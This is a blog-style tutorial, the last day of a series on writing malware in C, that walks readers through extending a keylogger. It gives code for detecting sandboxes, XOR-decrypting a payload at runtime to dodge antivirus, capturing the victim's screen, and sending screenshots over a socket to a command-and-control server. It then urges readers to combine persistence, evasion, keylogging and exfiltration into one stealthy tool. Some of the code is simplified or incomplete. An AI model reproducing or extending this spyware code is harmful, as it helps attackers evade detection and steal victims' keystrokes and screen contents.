10-Day Plan for Learning Malware Development in C: Day 10 – Evasion Techniques and Feature Enhancements

Let's work on refining and improving the malware we’ve built over the past nine days. Specifically, we'll explore advanced evasion techniques that make detection by antivirus and security software more difficult, and we'll also add new features to extend the capabilities of our keylogger. By the end of this session, you will have a more sophisticated malware tool that not only evades detection more effectively but also includes enhanced features, like taking screenshots or capturing audio.

Day 10 – Evasion Techniques and Feature Enhancements

Objective

Today's goal is to learn advanced techniques for evading detection and add additional capabilities to your malware. You will learn how to avoid detection using techniques like sandbox detection and advanced obfuscation. We will also add a new feature to our malware—such as capturing screenshots—and send the gathered information to a remote server.

Understanding Advanced Detection Evasion Techniques

Evasion techniques are critical for malware to remain undetected by antivirus (AV) solutions or sandbox analysis tools. Let's explore two important evasion strategies: sandbox detection and advanced obfuscation.

Sandbox Detection

Security researchers and antivirus companies often use sandbox environments to analyze potentially malicious files without risking harm to real systems. Malware authors often implement checks to detect whether their software is running inside a sandbox and, if detected, will alter behavior or exit.

Techniques for Sandbox Detection

• Checking System Artifacts: Sandboxes are often run on virtual machines (VMs), which may have specific identifiers, such as fewer cores, low RAM, or VM-related registry entries. Your malware can check for these artifacts and choose not to execute if they are detected.
• Timing Attacks: Many sandbox environments run for a short duration to evaluate the behavior of a file. You can delay the malicious behavior using Sleep() functions to bypass short analysis times.

Example

#include <windows.h>

int isSandbox() {
    MEMORYSTATUS memInfo;
    GlobalMemoryStatus(&memInfo);
    if (memInfo.dwTotalPhys / (1024 * 1024) < 2048) {
        return 1;  // Likely a sandbox if memory is very low
    }
    return 0;
}

int main() {
    if (isSandbox()) {
        printf("Sandbox detected, exiting...\n");
        return 0;
    }
    // Rest of the malware code
}

In this example, the malware checks whether the total system RAM is less than 2GB, which could indicate that it's running inside a virtualized sandbox environment.

Advanced Obfuscation

• We previously used XOR obfuscation for string encryption. Today, we’ll explore polymorphism and more advanced obfuscation to hide the intent of our malware.
• Polymorphism: You can encrypt the main payload of your malware and decrypt it dynamically during runtime, effectively making each instance look different.

Example

#include <stdio.h>
#include <string.h>

void decryptPayload(char *payload, char key) {
    for (int i = 0; i < strlen(payload); i++) {
        payload[i] ^= key;
    }
}

int main() {
    char encryptedPayload[] = "\x5a\x42\x5e\x5f";  // Encrypted version of the actual payload
    decryptPayload(encryptedPayload, 'X');
    // Execute the decrypted payload
}

Adding New Features to Your Malware

In addition to evading detection, we want to enhance the functionality of our keylogger. Today, we’ll add a feature that captures screenshots of the victim’s desktop and sends them to our Command and Control (C2) server.

Capturing Screenshots in Windows

To capture a screenshot in Windows, we can use the GDI+ API, which allows us to take a snapshot of the desktop and save it as an image. We’ll also learn how to send the screenshot to our server for later analysis.

Example Code to Capture Screenshot

#include <windows.h>

void captureScreenshot(const char *filename) {
    // Get screen dimensions
    int screenX = GetSystemMetrics(SM_CXSCREEN);
    int screenY = GetSystemMetrics(SM_CYSCREEN);

    // Create a device context for the entire screen
    HDC hScreenDC = GetDC(NULL);
    HDC hMemoryDC = CreateCompatibleDC(hScreenDC);
    HBITMAP hBitmap = CreateCompatibleBitmap(hScreenDC, screenX, screenY);
    SelectObject(hMemoryDC, hBitmap);

    // Copy screen to memory
    BitBlt(hMemoryDC, 0, 0, screenX, screenY, hScreenDC, 0, 0, SRCCOPY);
    
    // Save bitmap to a file
    BITMAPFILEHEADER bfHeader;
    BITMAPINFOHEADER biHeader;
    FILE *file = fopen(filename, "wb");
    if (file == NULL) {
        printf("Error: Unable to open file for writing.\n");
        return;
    }
    
    // Write the headers and bitmap data to file
    // (Simplified example, actual implementation requires more details)
    fwrite(&bfHeader, sizeof(bfHeader), 1, file);
    fwrite(&biHeader, sizeof(biHeader), 1, file);
    // Write the pixel data

    fclose(file);
    // Clean up
    DeleteObject(hBitmap);
    DeleteDC(hMemoryDC);
    ReleaseDC(NULL, hScreenDC);
}

Integrating Screenshot Capture into C2 Communication

Once we capture a screenshot, we can send it to our C2 server for analysis. This requires us to open a connection to the server and transmit the file as binary data.

Example Code to Send Screenshot Data

Assuming you have a C2 server ready (from Day 9's Python server example), we can extend our client code to open the screenshot file and send it.

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")  // Link with the Winsock library

int main(int argc, char *argv[]) {
    // Your code for screenshot or C2 here
    return 0;
}

void sendScreenshot(const char *filename) {
    WSADATA wsaData;
    SOCKET sock;
    struct sockaddr_in server;
    FILE *file;
    char buffer[1024];
    int bytesRead;

    // Initialize Winsock
    WSAStartup(MAKEWORD(2, 2), &wsaData);

    // Create socket
    sock = socket(AF_INET, SOCK_STREAM, 0);

    // Set server details
    server.sin_addr.s_addr = inet_addr("127.0.0.1");
    server.sin_family = AF_INET;
    server.sin_port = htons(8080);

    // Connect to C2 server
    connect(sock, (struct sockaddr *)&server, sizeof(server));

    // Open screenshot file
    file = fopen(filename, "rb");
    if (file == NULL) {
        printf("Error: Unable to open screenshot file.\n");
        return;
    }

    // Read and send the file data
    while ((bytesRead = fread(buffer, 1, sizeof(buffer), file)) > 0) {
        send(sock, buffer, bytesRead, 0);
    }

    // Clean up
    fclose(file);
    closesocket(sock);
    WSACleanup();
}

Putting It All Together

Compilation Flags: Use the following flags with GCC to specify that it should link as a console program, and to properly link GDI and other libraries:

gcc -o screenshot screenshot.c -lws2_32 -luser32 -lgdi32 -mconsole -mwindows

Add the -mwindows Flag (If Required): The -mwindows flag tells GCC to expect the entry point to be main(), which should help in removing the error related to WinMain.

Finally, integrate the detection evasion, keylogging, and screenshot-capturing features into a single program that maintains persistence, evades detection, logs keystrokes, captures screenshots, and communicates with a C2 server. This makes your malware more advanced and effective while still providing practical hands-on experience in malware development.

Conclusion

That's it, now you know how to add advanced evasion techniques and how to enhance malware functionality with features like screenshot capture. This final step of our 10-day series provides you with a comprehensive overview of how malware can remain stealthy, persist on a system, and collect and exfiltrate sensitive information. With these skills, you now have a deeper understanding of how real-world malware functions and the techniques attackers use to maintain control over compromised systems.

Happy Hacking! ❤